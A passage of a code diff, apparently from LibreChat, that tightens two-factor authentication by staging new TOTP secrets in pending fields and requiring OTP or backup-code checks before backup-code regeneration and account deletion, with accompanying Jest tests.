const { token } = req.body;
|
||||||
const user = await getUserById(userId, '_id totpSecret');
|
const user = await getUserById(
|
||||||
|
userId,
|
||||||
|
'+totpSecret +pendingTotpSecret +pendingBackupCodes _id',
|
||||||
|
);
|
||||||
|
const secretSource = user?.pendingTotpSecret ?? user?.totpSecret;
|
||||||
|
|
||||||
if (!user || !user.totpSecret) {
|
if (!user || !secretSource) {
|
||||||
return res.status(400).json({ message: '2FA not initiated' });
|
return res.status(400).json({ message: '2FA not initiated' });
|
||||||
}
|
}
|
||||||
|
|
||||||
const secret = await getTOTPSecret(user.totpSecret);
|
const secret = await getTOTPSecret(secretSource);
|
||||||
if (await verifyTOTP(secret, token)) {
|
if (await verifyTOTP(secret, token)) {
|
||||||
await updateUser(userId, { twoFactorEnabled: true });
|
const update = {
|
||||||
|
totpSecret: user.pendingTotpSecret ?? user.totpSecret,
|
||||||
|
twoFactorEnabled: true,
|
||||||
|
pendingTotpSecret: null,
|
||||||
|
pendingBackupCodes: [],
|
||||||
|
};
|
||||||
|
if (user.pendingBackupCodes?.length) {
|
||||||
|
update.backupCodes = user.pendingBackupCodes;
|
||||||
|
}
|
||||||
|
await updateUser(userId, update);
|
||||||
return res.status(200).json();
|
return res.status(200).json();
|
||||||
}
|
}
|
||||||
return res.status(400).json({ message: 'Invalid token.' });
|
return res.status(400).json({ message: 'Invalid token.' });
|
||||||
|
|
@ -104,31 +137,27 @@ const disable2FA = async (req, res) => {
|
||||||
try {
|
try {
|
||||||
const userId = req.user.id;
|
const userId = req.user.id;
|
||||||
const { token, backupCode } = req.body;
|
const { token, backupCode } = req.body;
|
||||||
const user = await getUserById(userId, '_id totpSecret backupCodes');
|
const user = await getUserById(userId, '+totpSecret +backupCodes _id twoFactorEnabled');
|
||||||
|
|
||||||
if (!user || !user.totpSecret) {
|
if (!user || !user.totpSecret) {
|
||||||
return res.status(400).json({ message: '2FA is not setup for this user' });
|
return res.status(400).json({ message: '2FA is not setup for this user' });
|
||||||
}
|
}
|
||||||
|
|
||||||
if (user.twoFactorEnabled) {
|
if (user.twoFactorEnabled) {
|
||||||
const secret = await getTOTPSecret(user.totpSecret);
|
const result = await verifyOTPOrBackupCode({ user, token, backupCode });
|
||||||
let isVerified = false;
|
|
||||||
|
|
||||||
if (token) {
|
if (!result.verified) {
|
||||||
isVerified = await verifyTOTP(secret, token);
|
const msg = result.message ?? 'Either token or backup code is required to disable 2FA';
|
||||||
} else if (backupCode) {
|
return res.status(result.status ?? 400).json({ message: msg });
|
||||||
isVerified = await verifyBackupCode({ user, backupCode });
|
|
||||||
} else {
|
|
||||||
return res
|
|
||||||
.status(400)
|
|
||||||
.json({ message: 'Either token or backup code is required to disable 2FA' });
|
|
||||||
}
|
|
||||||
|
|
||||||
if (!isVerified) {
|
|
||||||
return res.status(401).json({ message: 'Invalid token or backup code' });
|
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
await updateUser(userId, { totpSecret: null, backupCodes: [], twoFactorEnabled: false });
|
await updateUser(userId, {
|
||||||
|
totpSecret: null,
|
||||||
|
backupCodes: [],
|
||||||
|
twoFactorEnabled: false,
|
||||||
|
pendingTotpSecret: null,
|
||||||
|
pendingBackupCodes: [],
|
||||||
|
});
|
||||||
return res.status(200).json();
|
return res.status(200).json();
|
||||||
} catch (err) {
|
} catch (err) {
|
||||||
logger.error('[disable2FA]', err);
|
logger.error('[disable2FA]', err);
|
||||||
|
|
@ -138,10 +167,28 @@ const disable2FA = async (req, res) => {
|
||||||
|
|
||||||
/**
|
/**
|
||||||
* Regenerate backup codes for the user.
|
* Regenerate backup codes for the user.
|
||||||
|
* Requires OTP or backup code verification if 2FA is already enabled.
|
||||||
*/
|
*/
|
||||||
const regenerateBackupCodes = async (req, res) => {
|
const regenerateBackupCodes = async (req, res) => {
|
||||||
try {
|
try {
|
||||||
const userId = req.user.id;
|
const userId = req.user.id;
|
||||||
|
const user = await getUserById(userId, '+totpSecret +backupCodes _id twoFactorEnabled');
|
||||||
|
|
||||||
|
if (!user) {
|
||||||
|
return res.status(404).json({ message: 'User not found' });
|
||||||
|
}
|
||||||
|
|
||||||
|
if (user.twoFactorEnabled) {
|
||||||
|
const { token, backupCode } = req.body;
|
||||||
|
const result = await verifyOTPOrBackupCode({ user, token, backupCode });
|
||||||
|
|
||||||
|
if (!result.verified) {
|
||||||
|
const msg =
|
||||||
|
result.message ?? 'TOTP token or backup code is required to regenerate backup codes';
|
||||||
|
return res.status(result.status ?? 400).json({ message: msg });
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
const { plainCodes, codeObjects } = await generateBackupCodes();
|
const { plainCodes, codeObjects } = await generateBackupCodes();
|
||||||
await updateUser(userId, { backupCodes: codeObjects });
|
await updateUser(userId, { backupCodes: codeObjects });
|
||||||
return res.status(200).json({
|
return res.status(200).json({
|
||||||
|
|
|
||||||
|
|
@ -14,6 +14,7 @@ const {
|
||||||
deleteMessages,
|
deleteMessages,
|
||||||
deletePresets,
|
deletePresets,
|
||||||
deleteUserKey,
|
deleteUserKey,
|
||||||
|
getUserById,
|
||||||
deleteConvos,
|
deleteConvos,
|
||||||
deleteFiles,
|
deleteFiles,
|
||||||
updateUser,
|
updateUser,
|
||||||
|
|
@ -34,6 +35,7 @@ const {
|
||||||
User,
|
User,
|
||||||
} = require('~/db/models');
|
} = require('~/db/models');
|
||||||
const { updateUserPluginAuth, deleteUserPluginAuth } = require('~/server/services/PluginService');
|
const { updateUserPluginAuth, deleteUserPluginAuth } = require('~/server/services/PluginService');
|
||||||
|
const { verifyOTPOrBackupCode } = require('~/server/services/twoFactorService');
|
||||||
const { verifyEmail, resendVerificationEmail } = require('~/server/services/AuthService');
|
const { verifyEmail, resendVerificationEmail } = require('~/server/services/AuthService');
|
||||||
const { getMCPManager, getFlowStateManager, getMCPServersRegistry } = require('~/config');
|
const { getMCPManager, getFlowStateManager, getMCPServersRegistry } = require('~/config');
|
||||||
const { invalidateCachedTools } = require('~/server/services/Config/getCachedTools');
|
const { invalidateCachedTools } = require('~/server/services/Config/getCachedTools');
|
||||||
|
|
@ -241,6 +243,22 @@ const deleteUserController = async (req, res) => {
|
||||||
const { user } = req;
|
const { user } = req;
|
||||||
|
|
||||||
try {
|
try {
|
||||||
|
const existingUser = await getUserById(
|
||||||
|
user.id,
|
||||||
|
'+totpSecret +backupCodes _id twoFactorEnabled',
|
||||||
|
);
|
||||||
|
if (existingUser && existingUser.twoFactorEnabled) {
|
||||||
|
const { token, backupCode } = req.body;
|
||||||
|
const result = await verifyOTPOrBackupCode({ user: existingUser, token, backupCode });
|
||||||
|
|
||||||
|
if (!result.verified) {
|
||||||
|
const msg =
|
||||||
|
result.message ??
|
||||||
|
'TOTP token or backup code is required to delete account with 2FA enabled';
|
||||||
|
return res.status(result.status ?? 400).json({ message: msg });
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
await deleteMessages({ user: user.id }); // delete user messages
|
await deleteMessages({ user: user.id }); // delete user messages
|
||||||
await deleteAllUserSessions({ userId: user.id }); // delete user sessions
|
await deleteAllUserSessions({ userId: user.id }); // delete user sessions
|
||||||
await Transaction.deleteMany({ user: user.id }); // delete user transactions
|
await Transaction.deleteMany({ user: user.id }); // delete user transactions
|
||||||
|
|
@ -352,6 +370,7 @@ const maybeUninstallOAuthMCP = async (userId, pluginKey, appConfig) => {
|
||||||
serverConfig.oauth?.revocation_endpoint_auth_methods_supported ??
|
serverConfig.oauth?.revocation_endpoint_auth_methods_supported ??
|
||||||
clientMetadata.revocation_endpoint_auth_methods_supported;
|
clientMetadata.revocation_endpoint_auth_methods_supported;
|
||||||
const oauthHeaders = serverConfig.oauth_headers ?? {};
|
const oauthHeaders = serverConfig.oauth_headers ?? {};
|
||||||
|
const allowedDomains = getMCPServersRegistry().getAllowedDomains();
|
||||||
|
|
||||||
if (tokens?.access_token) {
|
if (tokens?.access_token) {
|
||||||
try {
|
try {
|
||||||
|
|
@ -367,6 +386,7 @@ const maybeUninstallOAuthMCP = async (userId, pluginKey, appConfig) => {
|
||||||
revocationEndpointAuthMethodsSupported,
|
revocationEndpointAuthMethodsSupported,
|
||||||
},
|
},
|
||||||
oauthHeaders,
|
oauthHeaders,
|
||||||
|
allowedDomains,
|
||||||
);
|
);
|
||||||
} catch (error) {
|
} catch (error) {
|
||||||
logger.error(`Error revoking OAuth access token for ${serverName}:`, error);
|
logger.error(`Error revoking OAuth access token for ${serverName}:`, error);
|
||||||
|
|
@ -387,6 +407,7 @@ const maybeUninstallOAuthMCP = async (userId, pluginKey, appConfig) => {
|
||||||
revocationEndpointAuthMethodsSupported,
|
revocationEndpointAuthMethodsSupported,
|
||||||
},
|
},
|
||||||
oauthHeaders,
|
oauthHeaders,
|
||||||
|
allowedDomains,
|
||||||
);
|
);
|
||||||
} catch (error) {
|
} catch (error) {
|
||||||
logger.error(`Error revoking OAuth refresh token for ${serverName}:`, error);
|
logger.error(`Error revoking OAuth refresh token for ${serverName}:`, error);
|
||||||
|
|
|
||||||
264
api/server/controllers/__tests__/TwoFactorController.spec.js
Normal file
264
api/server/controllers/__tests__/TwoFactorController.spec.js
Normal file
|
|
@ -0,0 +1,264 @@
|
||||||
|
const mockGetUserById = jest.fn();
|
||||||
|
const mockUpdateUser = jest.fn();
|
||||||
|
const mockVerifyOTPOrBackupCode = jest.fn();
|
||||||
|
const mockGenerateTOTPSecret = jest.fn();
|
||||||
|
const mockGenerateBackupCodes = jest.fn();
|
||||||
|
const mockEncryptV3 = jest.fn();
|
||||||
|
|
||||||
|
jest.mock('@librechat/data-schemas', () => ({
|
||||||
|
encryptV3: (...args) => mockEncryptV3(...args),
|
||||||
|
logger: { error: jest.fn() },
|
||||||
|
}));
|
||||||
|
|
||||||
|
jest.mock('~/server/services/twoFactorService', () => ({
|
||||||
|
verifyOTPOrBackupCode: (...args) => mockVerifyOTPOrBackupCode(...args),
|
||||||
|
generateBackupCodes: (...args) => mockGenerateBackupCodes(...args),
|
||||||
|
generateTOTPSecret: (...args) => mockGenerateTOTPSecret(...args),
|
||||||
|
verifyBackupCode: jest.fn(),
|
||||||
|
getTOTPSecret: jest.fn(),
|
||||||
|
verifyTOTP: jest.fn(),
|
||||||
|
}));
|
||||||
|
|
||||||
|
jest.mock('~/models', () => ({
|
||||||
|
getUserById: (...args) => mockGetUserById(...args),
|
||||||
|
updateUser: (...args) => mockUpdateUser(...args),
|
||||||
|
}));
|
||||||
|
|
||||||
|
const { enable2FA, regenerateBackupCodes } = require('~/server/controllers/TwoFactorController');
|
||||||
|
|
||||||
|
function createRes() {
|
||||||
|
const res = {};
|
||||||
|
res.status = jest.fn().mockReturnValue(res);
|
||||||
|
res.json = jest.fn().mockReturnValue(res);
|
||||||
|
return res;
|
||||||
|
}
|
||||||
|
|
||||||
|
const PLAIN_CODES = ['code1', 'code2', 'code3'];
|
||||||
|
const CODE_OBJECTS = [
|
||||||
|
{ codeHash: 'h1', used: false, usedAt: null },
|
||||||
|
{ codeHash: 'h2', used: false, usedAt: null },
|
||||||
|
{ codeHash: 'h3', used: false, usedAt: null },
|
||||||
|
];
|
||||||
|
|
||||||
|
beforeEach(() => {
|
||||||
|
jest.clearAllMocks();
|
||||||
|
mockGenerateTOTPSecret.mockReturnValue('NEWSECRET');
|
||||||
|
mockGenerateBackupCodes.mockResolvedValue({ plainCodes: PLAIN_CODES, codeObjects: CODE_OBJECTS });
|
||||||
|
mockEncryptV3.mockReturnValue('encrypted-secret');
|
||||||
|
});
|
||||||
|
|
||||||
|
describe('enable2FA', () => {
|
||||||
|
it('allows first-time setup without token — writes to pending fields', async () => {
|
||||||
|
const req = { user: { id: 'user1' }, body: {} };
|
||||||
|
const res = createRes();
|
||||||
|
mockGetUserById.mockResolvedValue({ _id: 'user1', twoFactorEnabled: false, email: 'a@b.com' });
|
||||||
|
mockUpdateUser.mockResolvedValue({ email: 'a@b.com' });
|
||||||
|
|
||||||
|
await enable2FA(req, res);
|
||||||
|
|
||||||
|
expect(res.status).toHaveBeenCalledWith(200);
|
||||||
|
expect(res.json).toHaveBeenCalledWith(
|
||||||
|
expect.objectContaining({ otpauthUrl: expect.any(String), backupCodes: PLAIN_CODES }),
|
||||||
|
);
|
||||||
|
expect(mockVerifyOTPOrBackupCode).not.toHaveBeenCalled();
|
||||||
|
const updateCall = mockUpdateUser.mock.calls[0][1];
|
||||||
|
expect(updateCall).toHaveProperty('pendingTotpSecret', 'encrypted-secret');
|
||||||
|
expect(updateCall).toHaveProperty('pendingBackupCodes', CODE_OBJECTS);
|
||||||
|
expect(updateCall).not.toHaveProperty('twoFactorEnabled');
|
||||||
|
expect(updateCall).not.toHaveProperty('totpSecret');
|
||||||
|
expect(updateCall).not.toHaveProperty('backupCodes');
|
||||||
|
});
|
||||||
|
|
||||||
|
it('re-enrollment writes to pending fields, leaving live 2FA intact', async () => {
|
||||||
|
const req = { user: { id: 'user1' }, body: { token: '123456' } };
|
||||||
|
const res = createRes();
|
||||||
|
const existingUser = {
|
||||||
|
_id: 'user1',
|
||||||
|
twoFactorEnabled: true,
|
||||||
|
totpSecret: 'enc-secret',
|
||||||
|
email: 'a@b.com',
|
||||||
|
};
|
||||||
|
mockGetUserById.mockResolvedValue(existingUser);
|
||||||
|
mockVerifyOTPOrBackupCode.mockResolvedValue({ verified: true });
|
||||||
|
mockUpdateUser.mockResolvedValue({ email: 'a@b.com' });
|
||||||
|
|
||||||
|
await enable2FA(req, res);
|
||||||
|
|
||||||
|
expect(mockVerifyOTPOrBackupCode).toHaveBeenCalledWith({
|
||||||
|
user: existingUser,
|
||||||
|
token: '123456',
|
||||||
|
backupCode: undefined,
|
||||||
|
persistBackupUse: false,
|
||||||
|
});
|
||||||
|
expect(res.status).toHaveBeenCalledWith(200);
|
||||||
|
const updateCall = mockUpdateUser.mock.calls[0][1];
|
||||||
|
expect(updateCall).toHaveProperty('pendingTotpSecret', 'encrypted-secret');
|
||||||
|
expect(updateCall).toHaveProperty('pendingBackupCodes', CODE_OBJECTS);
|
||||||
|
expect(updateCall).not.toHaveProperty('twoFactorEnabled');
|
||||||
|
expect(updateCall).not.toHaveProperty('totpSecret');
|
||||||
|
});
|
||||||
|
|
||||||
|
it('allows re-enrollment with valid backup code (persistBackupUse: false)', async () => {
|
||||||
|
const req = { user: { id: 'user1' }, body: { backupCode: 'backup123' } };
|
||||||
|
const res = createRes();
|
||||||
|
const existingUser = {
|
||||||
|
_id: 'user1',
|
||||||
|
twoFactorEnabled: true,
|
||||||
|
totpSecret: 'enc-secret',
|
||||||
|
email: 'a@b.com',
|
||||||
|
};
|
||||||
|
mockGetUserById.mockResolvedValue(existingUser);
|
||||||
|
mockVerifyOTPOrBackupCode.mockResolvedValue({ verified: true });
|
||||||
|
mockUpdateUser.mockResolvedValue({ email: 'a@b.com' });
|
||||||
|
|
||||||
|
await enable2FA(req, res);
|
||||||
|
|
||||||
|
expect(mockVerifyOTPOrBackupCode).toHaveBeenCalledWith(
|
||||||
|
expect.objectContaining({ persistBackupUse: false }),
|
||||||
|
);
|
||||||
|
expect(res.status).toHaveBeenCalledWith(200);
|
||||||
|
});
|
||||||
|
|
||||||
|
it('returns error when no token provided and 2FA is enabled', async () => {
|
||||||
|
const req = { user: { id: 'user1' }, body: {} };
|
||||||
|
const res = createRes();
|
||||||
|
mockGetUserById.mockResolvedValue({
|
||||||
|
_id: 'user1',
|
||||||
|
twoFactorEnabled: true,
|
||||||
|
totpSecret: 'enc-secret',
|
||||||
|
});
|
||||||
|
mockVerifyOTPOrBackupCode.mockResolvedValue({ verified: false, status: 400 });
|
||||||
|
|
||||||
|
await enable2FA(req, res);
|
||||||
|
|
||||||
|
expect(res.status).toHaveBeenCalledWith(400);
|
||||||
|
expect(mockUpdateUser).not.toHaveBeenCalled();
|
||||||
|
});
|
||||||
|
|
||||||
|
it('returns 401 when invalid token provided and 2FA is enabled', async () => {
|
||||||
|
const req = { user: { id: 'user1' }, body: { token: 'wrong' } };
|
||||||
|
const res = createRes();
|
||||||
|
mockGetUserById.mockResolvedValue({
|
||||||
|
_id: 'user1',
|
||||||
|
twoFactorEnabled: true,
|
||||||
|
totpSecret: 'enc-secret',
|
||||||
|
});
|
||||||
|
mockVerifyOTPOrBackupCode.mockResolvedValue({
|
||||||
|
verified: false,
|
||||||
|
status: 401,
|
||||||
|
message: 'Invalid token or backup code',
|
||||||
|
});
|
||||||
|
|
||||||
|
await enable2FA(req, res);
|
||||||
|
|
||||||
|
expect(res.status).toHaveBeenCalledWith(401);
|
||||||
|
expect(res.json).toHaveBeenCalledWith({ message: 'Invalid token or backup code' });
|
||||||
|
expect(mockUpdateUser).not.toHaveBeenCalled();
|
||||||
|
});
|
||||||
|
});
|
||||||
|
|
||||||
|
describe('regenerateBackupCodes', () => {
|
||||||
|
it('returns 404 when user not found', async () => {
|
||||||
|
const req = { user: { id: 'user1' }, body: {} };
|
||||||
|
const res = createRes();
|
||||||
|
mockGetUserById.mockResolvedValue(null);
|
||||||
|
|
||||||
|
await regenerateBackupCodes(req, res);
|
||||||
|
|
||||||
|
expect(res.status).toHaveBeenCalledWith(404);
|
||||||
|
expect(res.json).toHaveBeenCalledWith({ message: 'User not found' });
|
||||||
|
});
|
||||||
|
|
||||||
|
it('requires OTP when 2FA is enabled', async () => {
|
||||||
|
const req = { user: { id: 'user1' }, body: { token: '123456' } };
|
||||||
|
const res = createRes();
|
||||||
|
mockGetUserById.mockResolvedValue({
|
||||||
|
_id: 'user1',
|
||||||
|
twoFactorEnabled: true,
|
||||||
|
totpSecret: 'enc-secret',
|
||||||
|
});
|
||||||
|
mockVerifyOTPOrBackupCode.mockResolvedValue({ verified: true });
|
||||||
|
mockUpdateUser.mockResolvedValue({});
|
||||||
|
|
||||||
|
await regenerateBackupCodes(req, res);
|
||||||
|
|
||||||
|
expect(mockVerifyOTPOrBackupCode).toHaveBeenCalled();
|
||||||
|
expect(res.status).toHaveBeenCalledWith(200);
|
||||||
|
expect(res.json).toHaveBeenCalledWith({
|
||||||
|
backupCodes: PLAIN_CODES,
|
||||||
|
backupCodesHash: CODE_OBJECTS,
|
||||||
|
});
|
||||||
|
});
|
||||||
|
|
||||||
|
it('returns error when no token provided and 2FA is enabled', async () => {
|
||||||
|
const req = { user: { id: 'user1' }, body: {} };
|
||||||
|
const res = createRes();
|
||||||
|
mockGetUserById.mockResolvedValue({
|
||||||
|
_id: 'user1',
|
||||||
|
twoFactorEnabled: true,
|
||||||
|
totpSecret: 'enc-secret',
|
||||||
|
});
|
||||||
|
mockVerifyOTPOrBackupCode.mockResolvedValue({ verified: false, status: 400 });
|
||||||
|
|
||||||
|
await regenerateBackupCodes(req, res);
|
||||||
|
|
||||||
|
expect(res.status).toHaveBeenCalledWith(400);
|
||||||
|
});
|
||||||
|
|
||||||
|
it('returns 401 when invalid token provided and 2FA is enabled', async () => {
|
||||||
|
const req = { user: { id: 'user1' }, body: { token: 'wrong' } };
|
||||||
|
const res = createRes();
|
||||||
|
mockGetUserById.mockResolvedValue({
|
||||||
|
_id: 'user1',
|
||||||
|
twoFactorEnabled: true,
|
||||||
|
totpSecret: 'enc-secret',
|
||||||
|
});
|
||||||
|
mockVerifyOTPOrBackupCode.mockResolvedValue({
|
||||||
|
verified: false,
|
||||||
|
status: 401,
|
||||||
|
message: 'Invalid token or backup code',
|
||||||
|
});
|
||||||
|
|
||||||
|
await regenerateBackupCodes(req, res);
|
||||||
|
|
||||||
|
expect(res.status).toHaveBeenCalledWith(401);
|
||||||
|
expect(res.json).toHaveBeenCalledWith({ message: 'Invalid token or backup code' });
|
||||||
|
});
|
||||||
|
|
||||||
|
it('includes backupCodesHash in response', async () => {
|
||||||
|
const req = { user: { id: 'user1' }, body: { token: '123456' } };
|
||||||
|
const res = createRes();
|
||||||
|
mockGetUserById.mockResolvedValue({
|
||||||
|
_id: 'user1',
|
||||||
|
twoFactorEnabled: true,
|
||||||
|
totpSecret: 'enc-secret',
|
||||||
|
});
|
||||||
|
mockVerifyOTPOrBackupCode.mockResolvedValue({ verified: true });
|
||||||
|
mockUpdateUser.mockResolvedValue({});
|
||||||
|
|
||||||
|
await regenerateBackupCodes(req, res);
|
||||||
|
|
||||||
|
const responseBody = res.json.mock.calls[0][0];
|
||||||
|
expect(responseBody).toHaveProperty('backupCodesHash', CODE_OBJECTS);
|
||||||
|
expect(responseBody).toHaveProperty('backupCodes', PLAIN_CODES);
|
||||||
|
});
|
||||||
|
|
||||||
|
it('allows regeneration without token when 2FA is not enabled', async () => {
|
||||||
|
const req = { user: { id: 'user1' }, body: {} };
|
||||||
|
const res = createRes();
|
||||||
|
mockGetUserById.mockResolvedValue({
|
||||||
|
_id: 'user1',
|
||||||
|
twoFactorEnabled: false,
|
||||||
|
});
|
||||||
|
mockUpdateUser.mockResolvedValue({});
|
||||||
|
|
||||||
|
await regenerateBackupCodes(req, res);
|
||||||
|
|
||||||
|
expect(mockVerifyOTPOrBackupCode).not.toHaveBeenCalled();
|
||||||
|
expect(res.status).toHaveBeenCalledWith(200);
|
||||||
|
expect(res.json).toHaveBeenCalledWith({
|
||||||
|
backupCodes: PLAIN_CODES,
|
||||||
|
backupCodesHash: CODE_OBJECTS,
|
||||||
|
});
|
||||||
|
});
|
||||||
|
});
|
||||||
302
api/server/controllers/__tests__/deleteUser.spec.js
Normal file
302
api/server/controllers/__tests__/deleteUser.spec.js
Normal file
|
|
@ -0,0 +1,302 @@
|
||||||
|
const mockGetUserById = jest.fn();
|
||||||
|
const mockDeleteMessages = jest.fn();
|
||||||
|
const mockDeleteAllUserSessions = jest.fn();
|
||||||
|
const mockDeleteUserById = jest.fn();
|
||||||
|
const mockDeleteAllSharedLinks = jest.fn();
|
||||||
|
const mockDeletePresets = jest.fn();
|
||||||
|
const mockDeleteUserKey = jest.fn();
|
||||||
|
const mockDeleteConvos = jest.fn();
|
||||||
|
const mockDeleteFiles = jest.fn();
|
||||||
|
const mockGetFiles = jest.fn();
|
||||||
|
const mockUpdateUserPlugins = jest.fn();
|
||||||
|
const mockUpdateUser = jest.fn();
|
||||||
|
const mockFindToken = jest.fn();
|
||||||
|
const mockVerifyOTPOrBackupCode = jest.fn();
|
||||||
|
const mockDeleteUserPluginAuth = jest.fn();
|
||||||
|
const mockProcessDeleteRequest = jest.fn();
|
||||||
|
const mockDeleteToolCalls = jest.fn();
|
||||||
|
const mockDeleteUserAgents = jest.fn();
|
||||||
|
const mockDeleteUserPrompts = jest.fn();
|
||||||
|
|
||||||
|
jest.mock('@librechat/data-schemas', () => ({
|
||||||
|
logger: { error: jest.fn(), info: jest.fn() },
|
||||||
|
webSearchKeys: [],
|
||||||
|
}));
|
||||||
|
|
||||||
|
jest.mock('librechat-data-provider', () => ({
|
||||||
|
Tools: {},
|
||||||
|
CacheKeys: {},
|
||||||
|
Constants: { mcp_delimiter: '::', mcp_prefix: 'mcp_' },
|
||||||
|
FileSources: {},
|
||||||
|
}));
|
||||||
|
|
||||||
|
jest.mock('@librechat/api', () => ({
|
||||||
|
MCPOAuthHandler: {},
|
||||||
|
MCPTokenStorage: {},
|
||||||
|
normalizeHttpError: jest.fn(),
|
||||||
|
extractWebSearchEnvVars: jest.fn(),
|
||||||
|
}));
|
||||||
|
|
||||||
|
jest.mock('~/models', () => ({
|
||||||
|
deleteAllUserSessions: (...args) => mockDeleteAllUserSessions(...args),
|
||||||
|
deleteAllSharedLinks: (...args) => mockDeleteAllSharedLinks(...args),
|
||||||
|
updateUserPlugins: (...args) => mockUpdateUserPlugins(...args),
|
||||||
|
deleteUserById: (...args) => mockDeleteUserById(...args),
|
||||||
|
deleteMessages: (...args) => mockDeleteMessages(...args),
|
||||||
|
deletePresets: (...args) => mockDeletePresets(...args),
|
||||||
|
deleteUserKey: (...args) => mockDeleteUserKey(...args),
|
||||||
|
getUserById: (...args) => mockGetUserById(...args),
|
||||||
|
deleteConvos: (...args) => mockDeleteConvos(...args),
|
||||||
|
deleteFiles: (...args) => mockDeleteFiles(...args),
|
||||||
|
updateUser: (...args) => mockUpdateUser(...args),
|
||||||
|
findToken: (...args) => mockFindToken(...args),
|
||||||
|
getFiles: (...args) => mockGetFiles(...args),
|
||||||
|
}));
|
||||||
|
|
||||||
|
jest.mock('~/db/models', () => ({
|
||||||
|
ConversationTag: { deleteMany: jest.fn() },
|
||||||
|
AgentApiKey: { deleteMany: jest.fn() },
|
||||||
|
Transaction: { deleteMany: jest.fn() },
|
||||||
|
MemoryEntry: { deleteMany: jest.fn() },
|
||||||
|
Assistant: { deleteMany: jest.fn() },
|
||||||
|
AclEntry: { deleteMany: jest.fn() },
|
||||||
|
Balance: { deleteMany: jest.fn() },
|
||||||
|
Action: { deleteMany: jest.fn() },
|
||||||
|
Group: { updateMany: jest.fn() },
|
||||||
|
Token: { deleteMany: jest.fn() },
|
||||||
|
User: {},
|
||||||
|
}));
|
||||||
|
|
||||||
|
jest.mock('~/server/services/PluginService', () => ({
|
||||||
|
updateUserPluginAuth: jest.fn(),
|
||||||
|
deleteUserPluginAuth: (...args) => mockDeleteUserPluginAuth(...args),
|
||||||
|
}));
|
||||||
|
|
||||||
|
jest.mock('~/server/services/twoFactorService', () => ({
|
||||||
|
verifyOTPOrBackupCode: (...args) => mockVerifyOTPOrBackupCode(...args),
|
||||||
|
}));
|
||||||
|
|
||||||
|
jest.mock('~/server/services/AuthService', () => ({
|
||||||
|
verifyEmail: jest.fn(),
|
||||||
|
resendVerificationEmail: jest.fn(),
|
||||||
|
}));
|
||||||
|
|
||||||
|
jest.mock('~/config', () => ({
|
||||||
|
getMCPManager: jest.fn(),
|
||||||
|
getFlowStateManager: jest.fn(),
|
||||||
|
getMCPServersRegistry: jest.fn(),
|
||||||
|
}));
|
||||||
|
|
||||||
|
jest.mock('~/server/services/Config/getCachedTools', () => ({
|
||||||
|
invalidateCachedTools: jest.fn(),
|
||||||
|
}));
|
||||||
|
|
||||||
|
jest.mock('~/server/services/Files/S3/crud', () => ({
|
||||||
|
needsRefresh: jest.fn(),
|
||||||
|
getNewS3URL: jest.fn(),
|
||||||
|
}));
|
||||||
|
|
||||||
|
jest.mock('~/server/services/Files/process', () => ({
|
||||||
|
processDeleteRequest: (...args) => mockProcessDeleteRequest(...args),
|
||||||
|
}));
|
||||||
|
|
||||||
|
jest.mock('~/server/services/Config', () => ({
|
||||||
|
getAppConfig: jest.fn(),
|
||||||
|
}));
|
||||||
|
|
||||||
|
jest.mock('~/models/ToolCall', () => ({
|
||||||
|
deleteToolCalls: (...args) => mockDeleteToolCalls(...args),
|
||||||
|
}));
|
||||||
|
|
||||||
|
jest.mock('~/models/Prompt', () => ({
|
||||||
|
deleteUserPrompts: (...args) => mockDeleteUserPrompts(...args),
|
||||||
|
}));
|
||||||
|
|
||||||
|
jest.mock('~/models/Agent', () => ({
|
||||||
|
deleteUserAgents: (...args) => mockDeleteUserAgents(...args),
|
||||||
|
}));
|
||||||
|
|
||||||
|
jest.mock('~/cache', () => ({
|
||||||
|
getLogStores: jest.fn(),
|
||||||
|
}));
|
||||||
|
|
||||||
|
const { deleteUserController } = require('~/server/controllers/UserController');
|
||||||
|
|
||||||
|
function createRes() {
|
||||||
|
const res = {};
|
||||||
|
res.status = jest.fn().mockReturnValue(res);
|
||||||
|
res.json = jest.fn().mockReturnValue(res);
|
||||||
|
res.send = jest.fn().mockReturnValue(res);
|
||||||
|
return res;
|
||||||
|
}
|
||||||
|
|
||||||
|
function stubDeletionMocks() {
|
||||||
|
mockDeleteMessages.mockResolvedValue();
|
||||||
|
mockDeleteAllUserSessions.mockResolvedValue();
|
||||||
|
mockDeleteUserKey.mockResolvedValue();
|
||||||
|
mockDeletePresets.mockResolvedValue();
|
||||||
|
mockDeleteConvos.mockResolvedValue();
|
||||||
|
mockDeleteUserPluginAuth.mockResolvedValue();
|
||||||
|
mockDeleteUserById.mockResolvedValue();
|
||||||
|
mockDeleteAllSharedLinks.mockResolvedValue();
|
||||||
|
mockGetFiles.mockResolvedValue([]);
|
||||||
|
mockProcessDeleteRequest.mockResolvedValue();
|
||||||
|
mockDeleteFiles.mockResolvedValue();
|
||||||
|
mockDeleteToolCalls.mockResolvedValue();
|
||||||
|
mockDeleteUserAgents.mockResolvedValue();
|
||||||
|
mockDeleteUserPrompts.mockResolvedValue();
|
||||||
|
}
|
||||||
|
|
||||||
|
beforeEach(() => {
|
||||||
|
jest.clearAllMocks();
|
||||||
|
stubDeletionMocks();
|
||||||
|
});
|
||||||
|
|
||||||
|
describe('deleteUserController - 2FA enforcement', () => {
|
||||||
|
it('proceeds with deletion when 2FA is not enabled', async () => {
|
||||||
|
const req = { user: { id: 'user1', _id: 'user1', email: 'a@b.com' }, body: {} };
|
||||||
|
const res = createRes();
|
||||||
|
mockGetUserById.mockResolvedValue({ _id: 'user1', twoFactorEnabled: false });
|
||||||
|
|
||||||
|
await deleteUserController(req, res);
|
||||||
|
|
||||||
|
expect(res.status).toHaveBeenCalledWith(200);
|
||||||
|
expect(res.send).toHaveBeenCalledWith({ message: 'User deleted' });
|
||||||
|
expect(mockDeleteMessages).toHaveBeenCalled();
|
||||||
|
expect(mockVerifyOTPOrBackupCode).not.toHaveBeenCalled();
|
||||||
|
});
|
||||||
|
|
||||||
|
it('proceeds with deletion when user has no 2FA record', async () => {
|
||||||
|
const req = { user: { id: 'user1', _id: 'user1', email: 'a@b.com' }, body: {} };
|
||||||
|
const res = createRes();
|
||||||
|
mockGetUserById.mockResolvedValue(null);
|
||||||
|
|
||||||
|
await deleteUserController(req, res);
|
||||||
|
|
||||||
|
expect(res.status).toHaveBeenCalledWith(200);
|
||||||
|
expect(res.send).toHaveBeenCalledWith({ message: 'User deleted' });
|
||||||
|
});
|
||||||
|
|
||||||
|
